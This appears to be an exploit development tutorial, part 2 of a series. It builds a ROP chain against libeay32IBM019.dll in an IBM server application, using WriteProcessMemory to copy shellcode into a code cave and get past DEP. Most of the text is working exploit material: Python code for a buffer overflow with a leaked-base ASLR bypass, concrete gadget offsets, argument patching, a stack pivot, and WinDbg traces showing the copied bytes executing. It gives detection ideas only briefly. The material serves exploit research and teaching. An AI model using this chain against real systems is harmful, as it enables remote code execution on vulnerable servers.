advanced memory protection bypasses, part 2: bypassing DEP

tl;dr

in part 1 , i talked about bypassing ASLR via information leaks. this time, we’ll try to bypass DEP (Data Execution Prevention) using a very specific method: leveraging WriteProcessMemory to copy shellcode into an already-executable region.

this post breaks down the internals of a Windows exploitation technique that leverages WriteProcessMemory and PE section manipulation to bypass memory protections. through careful ROP chain construction and code cave utilization in executable memory, we achieve reliable code execution while maintaining minimal forensic footprint. the analysis covers stack pivot mechanics, parameter chain validation, and the nuances of DLL memory layout - elements critical for both offensive development and defensive understanding of Windows memory corruption.

exploit

`WriteProcessMemory`

using WriteProcessMemory provides a very powerful advantage: it takes advantage of Windows memory protection granularity, specifically at the page-level rather than the byte-level.

this technique is more stable in ASLR environments because code sections typically have more predictable layouts than heap/stack.

the function prototype is as follows.

BOOL WriteProcessMemory(
    HANDLE hProcess,
    LPVOID lpBaseAddress,
    LPCVOID lpBuffer,
    SIZE_T nSize,
    SIZE_T *lpNumberOfBytesWritten
);

hProcess: this is the process handle. for the current process, we set it to -1 (i.e. -1 = GetCurrentProcess()).
lpBaseAddress: this is the target address, which must be in committed memory. in our case, it will be the destination address in the code cave (more on code caves later).
lpBuffer: this is the source buffer in the calling process’s address space. this will be our shellcode.
nSize: the size of data to copy. this must account for page boundaries if crossing pages.
*lpNumberOfBytesWritten: this points to the caller’s memory. it’s optional, and can be NULL in exploit scenarios.

some relevant checks are then performed, that look something like this:

if (!IsAddressValid(lpBaseAddress) || !IsAddressValid(lpBaseAddress + nSize - 1))
    return FALSE;

then, the protection modification occurs at the page-level.

MEMORY_BASIC_INFORMATION mbi;
VirtualQuery(lpBaseAddress, &mbi, sizeof(mbi));

this temporarily changes page protection via an internal NtProtectVirtualMemory call. this is why we don’t need to handle PAGE_EXECUTE_READ -> PAGE_EXECUTE_READWRITE.

we can sum up what happens when WriteProcessMemory executes:

the system checks the current protection level.

PAGE_EXECUTE_READ initial_protection = GetPageProtection(target_address);

there is then an internal call to NtProtectVirtualMemory.

STATUS_SUCCESS = NtProtectVirtualMemory(
    ProcessHandle,
    &BaseAddress,
    &RegionSize,
    PAGE_EXECUTE_READWRITE,
    &OldProtection
);

a memory copy operation takes place.

memcpy(target_address, source_buffer, size);

the protection is restored.

STATUS_SUCCESS = NtProtectVirtualMemory(
    ProcessHandle,
    &BaseAddress,
    &RegionSize,
    initial_protection,
    &OldProtection
);

this technique can bypass HIPS/EDR solutions because it uses legitimate API calls, and the temporary protection change is harder to detect than permanent changes. ideally, this technique works even with CFG (Control Flow Guard) enabled, as the copied shellcode resides in legitimate code pages.

there are some well-known detection methods for this, though. for one, monitoring WriteProcessMemory calls to executable regions and tracking protection changes on code pages. we can also validate the code signature and integrity post-write. last, but not least, we can monitor execution flow into known code cave regions.

code caves

theory

code cave diagram

code caves are unused spaces within executable memory regions. they appear as a region of null bytes (00), and can occur due to any of the following reasons:

compiler/linker memory alignment requirements.
PE section padding, to meet page boundaries (4KB alignment).
function alignment padding.
removed or dead code, leaving gaps.
optimization creating unused spaces between functions.

there are three types of code caves (by origin): natural (implicit), artificial (resource), and dynamic (function padding).

natural caves can stem from:

end-of-section padding (most common).
inter-function padding.
alignment gaps.

they’re also predictable, and often null-filled.

artificial caves can stem from:

deliberately added padding.
unused functions or data.
legacy code spaces.

they’re less predictable, and can sometimes contain non-null data.

dynamic caves stem from:

runtime-generated spaces.
JIT (Just In Time) compilation gaps.
hot-patching reserved areas.

these are usually platform or version dependent.

in the ’90s, code caves were used for simple shellcode injection, and they had fixed addresses. you could artificially inflate your high-score in a game by storing a basic payload inside memory.

space cadet

today, code caves are used for multi-stage payloads, position-independent code, evasion techniques , and complex exploit chains .

based on this, we can define our ideal code cave and its properties.

it has to be located in an executable memory region.
its size has to be sufficient for a payload.
it must be stable across program execution.
no null bytes should be in its address (so that our exploit remains stable).
it can’t be used for legitimate program flow.
it must be away from common execution paths.
it must maintain the original permissions.
it must survive program updates and patches.

of course, the ideal scenario is also a dream scenario :)

architecture

overview

code caves are fundamentally created in a scenario like below.

section .text
    ; normal compiled code
    push ebp
    mov ebp, esp
    ; ... functional code ...
    
    ; compiler/linker padding to next page boundary
    align 0x1000    ; forces alignment to 4KB page

this creates a code cave because of the section alignment requirements, the difference between Virtual and Physical sizes, and the padding requirements for memody pages.

following this logic, we can surmise that the code cave forms due to specific mechanisms, like the PE section alignment rules.

typedef struct {
    DWORD SectionAlignment;
    DWORD FileAlignment;
} IMAGE_OPTIONAL_HEADER;

the SectionAlignment is usually 0x1000 (4KB) and the FileAlignment is usually 0x200 (512B). when SectionAlignment is greater than FileAlignment, the virtual size becomes ALIGN_UP(Raw Size, SectionAlignment), meaning that implicit padding is created.

an example calculation of this can be like:

size_t actual_code_size = 0x2345;  // actual compiled code
size_t aligned_size = (actual_code_size + 0xFFF) & ~0xFFF;  // rounds up to 0x3000
size_t cave_size = aligned_size - actual_code_size;  // available cave space

recall the different types of caves, and we can define their architecture a little more clearly.

implicit caves

these are the most common, and created by section alignment.

struct ImplicitCave {
    uint32_t start;
    uint32_t end;
    size_t size;
};

start: this is the last used byte + 1.
end: the start of the next section.
size: usually up to 4KB - 1.

these have a predictable location, and reliable permissions. they also often contain null bytes.

function padding caves

these are created by compiler function alignment.

struct FunctionPaddingCave {
    uint8_t alignment_nops[VAR_SIZE];
};

alignment_nops[VAR_SIZE] is usually 1 - 15 bytes long. some common patterns include:

0x90: NOP.
0x66 0x90: 66 NOP.
0x0F 0x1F 0x00: multi-byte NOP.

resource caves

these are found in the .rsrc section. they’re less useful because they’re often READ-only and more monitored by security solutions.

struct ResourceCave {
    uint32_t resource_alignment;
    uint8_t padding[VAR_SIZE];
};

resource_alignment is usually 8 bytes long, and padding[VAR_SIZE] is the alignment padding.

memory protection

by analyzing the PTE (Page Table Entry) structure (x86), we can extrapolate to how to transition protection for our code cave.

struct PTE {
    unsigned present:1;         // must be 1
    unsigned writable:1;        // R/W flag
    unsigned user_mode:1;       // user/supervisor
    unsigned write_through:1;   // cache policy
    unsigned cache_disabled:1;  // cache policy
    unsigned accessed:1;        // has page been accessed?
    unsigned dirty:1;          // has page been written to?
    unsigned pat:1;            // page Attribute Table
    unsigned global:1;         // global page mapping
    unsigned ignored:3;        // available for system use
    unsigned frame:20;         // physical frame number
};

we could write a protection transition function: void analyze_protection_transition(void* cave_addr).

the pseudocode might be something like:

initial state (typical code section).
PTE.writable = 0
PTE.present = 1
PTE.user_mode = 1

translating this to our use case (during WriteProcessMemory), it will do some temporary PTE modification, followed by a TLB flush for the affected page, before invalidating the cache line and finally restoring permissions.

detection + validation

to detect and validate the cave, we could write a function that looks something like this.

bool validate_code_cave(void* candidate, size_t required_size) {
    // 1. memory pattern analysis
    bool has_nulls = true;
    for(size_t i = 0; i < required_size; i++) {
        if(((uint8_t*)candidate)[i] != 0) {
            has_nulls = false;
            break;
        }
    }
    
    // 2. permission verification
    MEMORY_BASIC_INFORMATION mbi;
    VirtualQuery(candidate, &mbi, sizeof(mbi));
    
    // 3. section boundary check
    bool crosses_boundary = check_section_boundary(candidate, required_size);
    
    // 4. execution path analysis
    bool in_execution_path = analyze_control_flow(candidate);
    
    return has_nulls && 
           (mbi.Protect & PAGE_EXECUTE_READ) && 
           !crosses_boundary && 
           !in_execution_path;
}

locating our code cave

is it present?

code cave located

using WinDbg and attaching it to our server application, we can find the code cave.

you can find the offset to the PE header by dumping the DWORD at offset 0x3C from the MZ header. we’ll then add 0x2C to the offset to find the offset to the code section.

> dd libeay32IBM019 + 3c L1
031f003c 00000108

> dd libeay32IBM019 + 108 + 2c L1
031f0134 00001000

>? libeay32IBM019 + 1000
Evaluate expression: 52367360 = 031f1000

the first command gets the PE header offset from the MZ header. it returns the value 0x108.

the second command attempts to find the code section offset, by using the PE header offset (0x108) and the offset to the code section (0x2c).

the last value we get is 031f1000. this means the code section starts at 0x031f1000.

we can use the !address command in WinDbg to get more information about the code section:

Usage:              Image
Base Address:       031f1000
End Address:        03283000
Region Size:        00092000 ( 584.000 kB)
State:              00001000    MEM_COMMIT
Protect:            00000020    PAGE_EXECUTE_READ
Type:               01000000    MEM_IMAGE
Allocation Base:    031f0000
Allocation Protect: 00000080    PAGE_EXECUTE_WRITECOPY

the code section starts at 0x031f1000 and ends at 0x03283000. it has a size of 0x92000 (584KB), and has the permissions PAGE_EXECUTE_READ.

one way to find out if a code cave exists is to subtract a large enough value from the upper bound of the code section. if the code section’s upper bound is 0x03283000, we can subtract a value like 0x400 (equal to 1024 bytes) from it, to find the candidate address of the code cave.

const uint32_t CODE_SECTION_END = 0x03283000;
const uint32_t REQUIRED_SPACE = 0x400;  // 1024 bytes
const uint32_t CANDIDATE_ADDR = CODE_SECTION_END - REQUIRED_SPACE;  // 0x03282c00

in WinDbg, you can subtract it directly.

> dd 03283000-400
03282c00 00000000 00000000 00000000 00000000
03282c10 00000000 00000000 00000000 00000000
03282c20 00000000 00000000 00000000 00000000
03282c30 00000000 00000000 00000000 00000000
03282c40 00000000 00000000 00000000 00000000
03282c50 00000000 00000000 00000000 00000000
03282c60 00000000 00000000 00000000 00000000
03282c70 00000000 00000000 00000000 00000000

the region between 0x03282c00 and 0x03283000 is a null-padded region.

>? 03283000-400 - libeay32IBM019
Evaluate expression: 601088 = 00092c00

this shows that the code cave starts at offset 0x92c00 into the module (we’ll use the offset 0x92c04 instead, to avoid all the potential null-byte issues during exploitation).

using the `.data` section

we can view the WriteProcessMemory structure slightly differently now.

BOOL WriteProcessMemory(
    HANDLE hProcess,              // -1 (0xFFFFFFFF) - pseudohandle
    LPVOID lpBaseAddress,        // dllBase + 0x92c04 (code cave)
    LPCVOID lpBuffer,            // stack address (needs ROP)
    SIZE_T nSize,                // shellcode size (needs ROP)
    SIZE_T *lpNumberOfBytesWritten // dllBase + 0xe401c (data section)
);

the reason we’re going with the .data section over the stack is because it will have a predictable location. it’s also going to be writable, plus no runtime address calculation is needed. the bonus is that it should survive process restarts.

> !d h - a libeay32IBM019
File Type: DLL
FILE HEADER VALUES
14C machine (i386)
6 number of sections

0 file pointer to symbol table
0 number of symbols
E0 size of optional header
2102 characteristics
Executable
32 bit word machine
DLL

SECTION HEADER #4
. data name
F018 virtual size
D5000 virtual address
CA00 size of raw data
D2000 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
C0000040 flags
Initialized Data
(no align specified)
Read Write

from the above, we find that the offset to the data section (RVA) is 0xD5000 and its size (Virtual Size) is 0xF018. the raw size is 0xCA00 and it has flags 0xC000040, which correspond to Read-Write (RW).

to check that the contents of the address aren’t being used (also to verify memory protections), we’ll need to dump the contents of the address just past the size value.

>? libeay32IBM019 + d5000 + f018 + 4
Evaluate expression: 53297180 = 032d401c

> dd 032d401c
032d401c 00000000 00000000 00000000 00000000
032d402c 00000000 00000000 00000000 00000000
032d403c 00000000 00000000 00000000 00000000
032d404c 00000000 00000000 00000000 00000000
032d405c 00000000 00000000 00000000 00000000
032d406c 00000000 00000000 00000000 00000000
032d407c 00000000 00000000 00000000 00000000
032d408c 00000000 00000000 00000000 00000000

>!vprot 032d401c
BaseAddress:        032d4000
AllocationBase:     031f0000
AllocationProtect:  00000080 PAGE_EXECUTE_WRITECOPY
RegionSize:         00001000
State:              00001000 MEM_COMMIT
Protect:            00000004 PAGE_READWRITE
Type:               01000000 MEM_IMAGE

> ? 032d401c - libeay32IBM019
Evaluate expression: 933916 = 000e401c

we find that the memory base address is 0x032d4000, the protection is PAGE_READWRITE, and the state is MEM_COMMIT. we also found a writable, unused DWORD inside the .data section, located at offset 0xe401c.

exploitation

ROP skeleton

we can now implement a call to this API using ROP. the PoC is a ROP skeleton that consists of the API address, return address, and the arguments to use WriteProcessMemory instead of VirtualAlloc.

in part 1, we used absolute addresses for ROP gadgets, but because of ASLR, we’ll identify every gadget here as the base address of libeay32IBM019 plus an offset.

libeay32IBM019Func = leakFuncAddr(b"N98E_CRYPTO_get_new_lockid", server)
dllBase = libeay32IBM019Func - 0x14E0  # base address calculation
print(str(hex(dllBase)))

# get address of WriteProcessMemory
WPMAddr = leakFuncAddr(b"WriteProcessMemory", server)
print(str(hex(WPMAddr)))

#psAgentCommand
buf = bytearray([0x41]*0xC)
buf += pack("<i", 0x534)    # opcode
buf += pack("<i", 0x0)      # 1st memcpy: offset
buf += pack("<i", 0x700)    # 1st memcpy: size field
buf += pack("<i", 0x0)      # 2nd memcpy: offset
buf += pack("<i", 0x100)    # 2nd memcpy: size field
buf += pack("<i", 0x0)      # 3rd memcpy: offset
buf += pack("<i", 0x100)    # 3rd memcpy: size field
buf += bytearray([0x41]*0x8)

#psCommandBuffer aka WPM ROP chain construction
wpm = pack("<L", WPMAddr)                    # API address
wpm += pack("<L", (dllBase + 0x92c04))       # return addr (code cave)
wpm += pack("<L", 0xFFFFFFFF)                # process handle (-1)
wpm += pack("<L", (dllBase + 0x92c04))       # destination addr
wpm += pack("<L", 0x41414141)                # stack addr placeholder
wpm += pack("<L", 0x42424242)                # size placeholder
wpm += pack("<L", (dllBase + 0xe401c))       # bytes written ptr

offset = b"A" * (276 - len(wpm))

the base address is leaked through N98E_CRYPTO_get_new_lockid and all offsets are calculated from it. there’s no need for complex ROP to resolve addresses.

the memory organization is like this:

exploit memory organization:
[buffer overflow padding]
[scanf trigger (0x534)]
[memcpy parameters]
[WPM ROP chain]
[additional padding (276 - len(wpm))]

building the ROP chain

stack setup

we start with identifying a gadget that can help us obtain a clean copy of the ESP (stack pointer) register without clobbering other registers. it needs to be single-purpose, with a predictable execution, and mustn’t have any side effects or complex instructions. it should also not rely on stack values beyond the return address.

this one does the trick.

0x100408d6: push esp ; pop esi ; ret

a quick aside: the reason for this is to get a reliable stack pointer and maintain control over the execution flow. it also gives us a clean register state for following operations.

we then need to find the ImageBase address from the PE header. since ASLR requires relative addressing, we won’t be able to use the absolute address of the gadget above (0x100408d6), and so we’ll need to calculate the offsets.

ImageBase provides a reliable reference point, and since all gadgets must be module-relative, this ensures exploit reliability across runs.

dd libeay32IBM019 + 3c L1     # gets PE header offset (0x108)
dd libeay32IBM019 + 108 + 34 L1  # gets ImageBase (0x10000000)

# gadget offset calculation
actual_offset = gadget_addr - 0x10000000

stack address resolution

the first phase of our ROP chain replaces the dummy stack address with the shellcode address. the first step of this phase is to align the EAX register with the shellcode address on the stack.

eip = pack("<L", (dllBase + 0x408d6)) # push esp ; pop esi ; ret

# get shellcode address
rop = pack("<L", (dllBase + 0x408d6))  # push esp ; pop esi ; ret
rop += pack("<L", (dllBase + 0x296f))  # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242))        # ESI junk value
rop += pack("<L", (dllBase + 0x117c))  # pop ecx ; ret

rop = pack("<L", (dllBase + 0x408d6)): this cleans the ESP capture without assumptions.
rop += pack("<L", (dllBase + 0x296f)): this gets the stack address in the working register.
rop += pack("<L", (0x42424242)): this maintains the stack alignment.

EAX is needed for later arithmetic, ESI preserves the original stack pointer, and the junk values maintain the stack frame integrity.

avoiding null bytes

to do some stack address arithmetic (i.e. avoiding nulls), we’ll need to use addition of negative values instead of direct subtraction. this is because exploit delivery often breaks on nulls, and large numbers ensure no null bytes.

in a two-part addition, we’ll get precise control and maintain our numeric results without null bytes.

# stack address arithmetic (avoiding nulls)
rop += pack("<L", (0x88888888))        # large value into ECX
rop += pack("<L", (dllBase + 0x1d0f0)) # add eax, ecx ; ret
rop += pack("<L", (dllBase + 0x117c))  # pop ecx ; ret
rop += pack("<L", (0x77777878))        # second adjustment
rop += pack("<L", (dllBase + 0x1d0f0)) # add eax, ecx ; ret

0x88888888 is the large, positive value (part 1 of the addition), and 0x77777878 is the complementary value (part 2).

`lpBuffer` patching mechanism

we’ll need to obtain the stack address where the lpBuffer argument should be patched into EAX. this is because the gadget being used uses the MOV [EAX], ECX instruction, so the address of the shellcode needs to be moved into ECX first.

rop += pack("<L", (dllBase + 0x8876d)) # mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010
rop += pack("<L", (0x42424242)) # junk into esi
rop += pack("<L", (dllBase + 0x48d8c)) # pop eax ; ret
rop += pack("<L", (0x42424242)) # junk for ret 0x10
rop += pack("<L", (0x42424242)) # junk for ret 0x10
rop += pack("<L", (0x42424242)) # junk for ret 0x10
rop += pack("<L", (0x42424242)) # junk for ret 0x10
rop += pack("<L", (0xfffffee0)) # pop into eax
rop += pack("<L", (dllBase + 0x1d0f0)) # add eax, ecx ; ret
rop += pack("<L", (dllBase + 0x1fd8)) # mov [eax], ecx ; ret

the first gadget uses a return instruction (with an offset of 0x10). execution will then return to the POP EAX gadget’s address on the stack, and the stack pointer is increased by 0x10. because of this, we’ll need to insert 0x10 junk bytes before the value 0xfffffee0 is popped into EAX.

the ROP chain then pops the value 0xfffffee0 into EAX and adds the contents of ECX to it. 0xfffffee0 corresponds to -0x120, which is the correct value to align EAX with the lpBuffer placeholder (aka the shellcode pointer) on the stack. the last gadget in the chain overwrites the lpBuffer argument with the real shellcode address.

you can verify this by placing a breakpoint on the gadget that writes the real shellcode address on the stack (libeay32IBM019+0x1fd8). you can then step over the mov instruction and display the ROP skeleton on the stack.

0:078> bp libeay32IBM019+0x 1fd8
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program
Files\ibm\gsk8\lib\N\icc\osslib\libeay32IBM019.dll -

0:078> g
Breakpoint 0 hit
eax=0dbbe2fc ebx=05f6c280 ecx=0dbbe41c edx=77251670 esi=42424242 edi=00669360
eip=03111fd8 esp=0dbbe364 ebp=41414141 iopl=0 nv up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000207
libeay32IBM019!N98E_CRYPTO_get_mem_ex_functions+0x48:
03111fd8 8908 mov dword ptr [eax],ecx ds:0023:0dbbe2fc=41414141

0:063> p
eax=0dbbe2fc ebx=05f6c280 ecx=0dbbe41c edx=77251670 esi=42424242 edi=00669360
eip=03111fda esp=0dbbe364 ebp=41414141 iopl=0 nv up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000207
libeay32IBM019!N98E_CRYPTO_get_mem_ex_functions+0x4a:
03111fda c3 ret

0:063> dd eax-10 L7
0dbbe2ec 75f42890 031a2c04 ffffffff 031a2c04
0dbbe2fc 0dbbe41c 42424242 031f401c

0:063> dd 0dbbe41c L8
0dbbe41c 44444444 44444444 44444444 44444444
0dbbe42c 44444444 44444444 44444444 44444444

shellcode size: `nSize`

the ROP skeleton is almost complete. we’ll need to overwrite the dummy shellcode size with the real one. the shellcode size doesn’t need to be precise, and since most generated shellcodes are less than 500 bytes, we can use an arbitrary value of -524 (0xffffdf4) and then negate it to make it positive.

# Patching nSize
rop += pack("<L", (dllBase + 0xbc79)) # inc eax ; ret
rop += pack("<L", (dllBase + 0xbc79)) # inc eax ; ret
rop += pack("<L", (dllBase + 0xbc79)) # inc eax ; ret
rop += pack("<L", (dllBase + 0xbc79)) # inc eax ; ret
rop += pack("<L", (dllBase + 0x408dd)) # push eax ; pop esi ; ret
rop += pack("<L", (dllBase + 0x48d8c)) # pop eax ; ret
rop +? pack("<L", (0xfffffdf4)) # -524
rop += pack("<L", (dllBase + 0x1d8c2)) # neg eax ; ret
rop += pack("<L", (dllBase + 0x8876d)) # mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010
rop += pack("<L", (0x42424242)) # junk into esi
rop += pack("<L", (dllBase + 0x1fd8)) # mov [eax], ecx ; ret
rop += pack("<L", (0x42424242)) # junk for ret 0x10
rop += pack("<L", (0x42424242)) # junk for ret 0x10
rop += pack("<L", (0x42424242)) # junk for ret 0x10
rop += pack("<L", (0x42424242)) # junk for ret 0x10

here, we’re increasing the EAX (which points to lpBuffer) by four to align it with the nSize argument.

we’ll need to save the updated EAX pointer by copying it to ESI. since there no simple way to obtain the shellcode size in ECX with our available gadgets, we’ll have to use EAX for the arithmetic and copy the result back to ECX.

for the final copy operation, we’ll need to copy the content of EAX into ECX and restore EAX from ESI. recall a gadget from the previous section, that contained a return instruction with an offset of 0x10. this will need to be accounted for in the ROP chain (0x10 junk bytes).

0:079> bp libeay32IBM019+0x1fd8
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program
Files\ibm\gsk8\lib\N\icc\osslib\libeay32IBM019.dll -
0:079> g
Breakpoint 0 hit
eax=1223e2fc ebx=073db868 ecx=1223e41c edx=77251670 esi=42424242 edi=00669360
eip=044e1fd8 esp=1223e364 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
nv up ei pl nz na pe cy
efl=00000207
libeay32IBM019!N98E_CRYPTO_get_mem_ex_functions+0x48:
044e1fd8 8908 mov dword ptr [eax],ecx ds:0023:1223e2fc=41414141
0:085> g
Breakpoint 0 hit
eax=1223e300 ebx=073db868 ecx=0000020c edx=77251670 esi=42424242 edi=00669360
eip=044e1fd8 esp=1223e3a0 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
nv up ei pl nz ac pe cy
efl=00000217
libeay32IBM019!N98E_CRYPTO_get_mem_ex_functions+0x48:
044e1fd8 8908 mov dword ptr [eax],ecx ds:0023:1223e300=42424242
0:085> p
eax=1223e300 ebx=073db868 ecx=0000020c edx=77251670 esi=42424242 edi=00669360
nv up ei pl nz ac pe cy
efl=00000217
eip=044e1fda esp=1223e3a0 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
libeay32IBM019!N98E_CRYPTO_get_mem_ex_functions+0x4a:
044e1fda c3 ret
0:085> dd eax-14 L7
1223e2ec 75f42890 04572c04 ffffffff 04572c04
1223e2fc 1223e41c 0000020c 045c401c

the ROP chain patched the nSize argument correctly! nice.

final alignments

we’ve correctly located the address for WriteProcessMemory, prepared the return address (the code cave), and staged all the arguments on the stack. all we need now is precise stack alignment for the WriteProcessMemory call. this means aligning EAX with the WriteProcessMemory address in the ROP skeleton in the stack, exchanging it with ESP, and returning into it. easy, right?

we know that EAX points 0x14 bytes ahead of WriteProcessMemory on the stack. we can fix this with previously used gadgets.

rop += pack("<L", (dllBase + 0x117c))  # pop ecx ; ret
rop += pack("<L", (0xffffffec))        # -0x14 (distance to WPM setup)
rop += pack("<L", (dllBase + 0x1d0f0)) # add eax, ecx ; ret
rop += pack("<L", (dllBase + 0x5b415)) # xchg eax, esp ; ret

the value -0x14 (0xffffffec) was popped into ECX, added it to EAX and then used a gadget with an xchg instruction to align ESP to the stack address stored in EAX. xchg provides a nice, clean stack pivot.

after execution, we should return into WriteProcessMemory with all the arguments set up correctly.

0:080> bp libeay32IBM019+0x5b415
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program
Files\ibm\gsk8\lib\N\icc\osslib\libeay32IBM019.dll -
0:080> g
Breakpoint 0 hit
eax=110ee2ec ebx=05fbf4d8 ecx=ffffffec edx=77251670 esi=42424242 edi=00669360
nv up ei pl nz na po cy
efl=00000203
eip=031bb415 esp=110ee3b0 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
libeay32IBM019!N98E_a2i_ASN1_INTEGER+0x85:
031bb415 94 xchg eax,esp
0:085> p
eax=110ee3b0 ebx=05fbf4d8 ecx=ffffffec edx=77251670 esi=42424242 edi=00669360
nv up ei pl nz na po cy
efl=00000203
eip=031bb416 esp=110ee2ec ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
libeay32IBM019!N98E_a2i_ASN1_INTEGER+0x86:
031bb416 c3 ret
0:085> p
eax=110ee3b0 ebx=05fbf4d8 ecx=ffffffec edx=77251670 esi=42424242 edi=00669360
nv up ei pl nz na po cy
efl=00000203
eip=75f42890 esp=110ee2f0 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
KERNEL32!WriteProcessMemoryStub:
75f42890 8bff mov edi,edi
0:085> dds esp L6
110ee2f0 0 3 1 f 2c 04 libeay32IBM019!N98E_bn_sub_words+0x107c
110ee2f4 ffffffff
110ee2f8 0 3 1 f 2c 04 libeay32IBM019!N98E_bn_sub_words+0x107c
110ee2fc 110ee41c
110ee300 0000020c
110ee304 0324401c libeay32IBM019!N98E_OSSL_DES_version+0x4f018

breakpoint on the 0x5b415 - xchg instruction shows a clean before-and-after picture.

Breakpoint Analysis (0x5b415 - xchg instruction):

initial state:
EAX=110ee2ec EBX=05fbf4d8 ECX=ffffffec EDX=77251670 
ESI=42424242 EDI=00669360
ESP=110ee3b0 EBP=41414141 EIP=031bb415

post-xchg State:
EAX=110ee3b0 (old ESP)
ESP=110ee2ec (aligned to WPM setup)
EIP=031bb416 (ready for ret)

final execution state:
EIP=75f42890 (WPM entry)
ESP=110ee2f0 (properly aligned for call)

note that lpBuffer is stored at 0x110ee41c.

verifications

dump the contents of the code cave before and after the API executes.

0:085> u 031f2c04
libeay32IBM019!N98E_bn_sub_words+0x107c:
031f2c04 0000 add byte ptr [eax],al
031f2c06 0000 add byte ptr [eax],al
031f2c08 0000 add byte ptr [eax],al
031f2c0a 0000 add byte ptr [eax],al
031f2c0c 0000 add byte ptr [eax],al
031f2c0e 0000 add byte ptr [eax],al
031f2c10 0000 add byte ptr [eax],al
031f2c12 0000 add byte ptr [eax],al
0:085> p t
eax=00000001 ebx=05fbf4d8 ecx=00000000 edx=77251670 esi=42424242 edi=00669360
eip=745f82a4 esp=110ee2f0 ebp=41414141 iopl=0 nv up ei pl nz na po nc cs=001b
ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
KERNELBASE!WriteProcessMemory+0x74:
745f82a4 c21400 ret 14h
0:085> u 031f2c04
libeay32IBM019!N98E_bn_sub_words+0x107c:
031f2c04 44 inc esp
031f2c05 44 inc esp
031f2c06 44 inc esp
031f2c07 44 inc esp
031f2c08 44 inc esp
031f2c09 44 inc esp
031f2c0a 44 inc esp
031f2c0b 44 inc esp

the contents here show that our fake shellcode data (0x44 bytes) was copied from the stack into the code cave.

using the INC ESP instructions (0x44 opcode), we can prove that DEP was bypassed.

0:085> r
eax=00000001 ebx=05fbf4d8 ecx=00000000 edx=77251670 esi=42424242 edi=00669360
eip=745f82a4 esp=110ee2f0 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
KERNELBASE!WriteProcessMemory+0x74:
745f82a4 c21400 ret 14h
0:085> p
eax=00000001 ebx=05fbf4d8 ecx=00000000 edx=77251670 esi=42424242 edi=00669360
eip=031f2c04 esp=110ee308 ebp=41414141 iopl=0 nv up ei pl nz na po nc cs=001b
ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
libeay32IBM019!N98E_bn_sub_words+0x107c:
031f2c04 44 inc esp
0:085> p
eax=00000001 ebx=05fbf4d8 ecx=00000000 edx=77251670 esi=42424242 edi=00669360
eip=031f2c05 esp=110ee309 ebp=41414141 iopl=0 nv up ei pl nz na pe nc cs=001b
ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
libeay32IBM019!N98E_bn_sub_words+0x107d:
031f2c05 44 inc esp
0:085> p
eax=00000001 ebx=05fbf4d8 ecx=00000000 edx=77251670 esi=42424242 edi=00669360
eip=031f2c06 esp=110ee30a ebp=41414141 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
libeay32IBM019!N98E_bn_sub_words+0x107e:
031f2c06 44 inc esp

EIP for the WriteProcessMemory return is 745f82a4, which corresponds to KERNELBASE!WriteProcessMemory+0x74, and ESP is 110ee2f0. the return value is EAX=1, meaning it’s a success.

on the code cave execution side, the EIP was 031f2c04 and the ESP was 110ee308. the execution proof also showed that each instruction was executed successfully.

    031f2c04: 44       inc esp
    031f2c05: 44       inc esp
    031f2c06: 44       inc esp